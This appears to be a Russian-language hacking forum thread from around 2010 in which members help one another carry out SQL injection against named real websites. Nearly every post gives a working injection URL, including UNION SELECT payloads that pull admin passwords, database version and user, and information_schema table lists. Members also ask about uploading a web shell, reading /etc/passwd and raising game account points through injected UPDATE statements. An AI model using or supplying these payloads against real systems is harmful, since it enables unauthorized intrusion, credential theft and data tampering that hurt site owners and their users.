Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    union select password,2,3,4,5,6,7,8,9,10 from users where username='admin'--
     
    1 person likes this.
  2. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Здесь есть скуля?

    http://www.diymtb.com.au/displayItems.asp?cid=14'
     
  3. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.diymtb.com.au/displayItems.asp?cid=14'+order+by+10%23
     
  4. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Не могу вывести version(),database(),user(). Как это сделать?
     
  5. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10%23

    p.s. не забудь +++ поставить я всетаки знаменитым хачу быть как Gorev...///=)))
     
    2 people like this.
  6. DavanG3

    DavanG3 New Member

    Joined:
    17 Apr 2010
    Messages:
    18
    Likes Received:
    1
    Reputations:
    0
    Хм жаль беспокоить Как я могу загрузить оболочку здесь?

    Code:
    http://www.vales.by/catalog.php?action=show_object&id=-99%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,17--
     
  7. KandidaT'S

    KandidaT'S New Member

    Joined:
    9 Jul 2010
    Messages:
    58
    Likes Received:
    3
    Reputations:
    0
    моно ли тут прочитать etc/passwd?
    http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,3,4,5,6,7,8,9--
     
  8. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Через phpbb который там есть (по крайней мере есть таблица phpbb3_acl_users)

    http://www.vales.by/catalog.php?action=show_object&id=-99%20UNION%20SELECT%201,2,3,4,group_concat%28table_name%29,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables--

    Админка (не форума http://www.vales.by/admin/login.php)

    Прочитать, кажись нельзя, но залить шелл возможно получится:
    http://kirovka.ru/business/?parentid=-30&article=-641+union+select+1,2,concat_ws%280x3a,table_name%29,4,5,6,7,8,9+from+information_schema.tables+--+
    Есть несколько форумов и так далее....
     
    #15408 z0mbyak, 19 Nov 2010
    Last edited: 19 Nov 2010
  9. killrok6

    killrok6 New Member

    Joined:
    30 Jul 2010
    Messages:
    33
    Likes Received:
    3
    Reputations:
    0
    Привет Всем! Подскажите правильно я перевел этот код:

    UPDATE dbo.Character SET AddPoint = AddPoint + 1
    WHERE AccountID = 'login'

    На вот этот:

    'update/**/dbo.character/**/set/**/addpoint='addpoint+1'/**/where/**/accountid='login'
     
  10. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Смотря что ты хочешь... если получить в базе addpoint+1, то да, если увеличить addpoint на единицу, то нет и, кстати, первый апостроф (перед update не нужен)
     
    #15410 z0mbyak, 19 Nov 2010
    Last edited: 19 Nov 2010
  11. killrok6

    killrok6 New Member

    Joined:
    30 Jul 2010
    Messages:
    33
    Likes Received:
    3
    Reputations:
    0
    union+update/**/dbo.character/**/set/**/addpoint='addpoint+1'/**/where/**/accountid='killro0000'

    Типо так?
     
  12. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Если нужен инкремент addpoint, то /set/**/addpoint='addpoint'+1/
    без union, это я обшибся малость:)

    Вот пример
    http://www.mysql.ru/webboard/index.html?n1=1160&n2=2
     
    #15412 z0mbyak, 19 Nov 2010
    Last edited: 19 Nov 2010
  13. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Все равно, не могу найти. Набираю в браузере:

    http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,user(),4,5,6,7,8,9,10%23

    и, где выводиться user()?
     
    #15413 FlaktW, 19 Nov 2010
    Last edited: 19 Nov 2010
  14. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    дайте ссылки на уязвимости (только php-inj.sql-inj) в Wordpress версии:
    2.7
    2.9.2
    3.0
    3.0.1
     
  15. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    ну и кагбэ в инкременте ошиблись немного. кавычки не нужны, совсем.
     
    2 people like this.
  16. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Помогите подобрать количество столбцов.

    http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2'
     
  17. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Code:
    http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2' union select 1,2,3,4,5 from CalProd where 1 and '1
    Бд - McAccess
    Имхо, одна из самых неблагодарных субд для проведения инъекций)
    И к тому же из-за наличия второго запроса с иным количеством полей мы не получим вывод)
    Так что советую поискать другие параметры, бо (проверил) они там присутствуют.
    З.ы - более подробно можно почитать тут:
    https://forum.antichat.ru/threadnav50550-1.html
     
    1 person likes this.
  18. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    Не могли бы вы уточнить, как вы нашли таблицу from CalProd. Это brutforce или какой то иной способ? Заранее спасибо за ответ.
     
  19. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Таблицу нашел исходя из сообщения об ошибке вот тут:
    Code:
    http://calidad.com.au/FindProdStep1.asp?MAN=Olivetti%27%29
    Других способов узнать имена таблиц (кроме перебора, конечно же) в данном случае нет. Так как доступ к таблице MSysObjects закрыт.
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    почти всегда есть доступ к msysaccessobjects :)
     
    _________________________
Thread Status:
Not open for further replies.